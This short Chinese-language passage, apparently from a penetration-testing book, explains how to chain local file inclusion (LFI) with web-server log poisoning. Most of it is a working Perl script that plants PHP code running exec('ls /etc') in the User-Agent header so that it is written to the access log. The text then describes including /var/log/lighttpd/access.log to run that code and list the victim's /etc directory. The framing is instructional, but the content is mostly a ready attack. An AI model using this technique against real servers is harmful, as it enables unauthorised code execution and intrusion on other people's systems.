17、网络安全渗透测试与密码破解技术解析

网络安全渗透测试与密码破解技术解析

1. 本地文件包含（LFI）与日志文件代码注入

在网络安全渗透测试中，本地文件包含（LFI）是一种常见的攻击手段。通过LFI，攻击者不仅可以显示受害者服务器上的文件，还能利用日志文件代码注入进一步获取更多信息。

在之前的例子中，我们可以将PHP代码放入 $ua->agent() 中，然后使用LFI显示HTTPD日志文件。以下是示例代码：

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$ua->agent('<?php echo "_0x031337_\nls /etc";'.
'exec("ls /etc",$ret);foreach($ret as '.
'$line){ echo $line."\n"; } echo "_0x0'.
'31337_\n"; ?>');
my $url = shift or die "Usage: ./rfi_log.pl <URL>";
my $req = $ua->get($url);

当我们浏览网站时， access.log 文件会包含我们注入的PHP代码。将 /var/log/lighttpd/access.log 添加到 @files 数组中，就可以获取受害者服务器 /etc 目录的内容。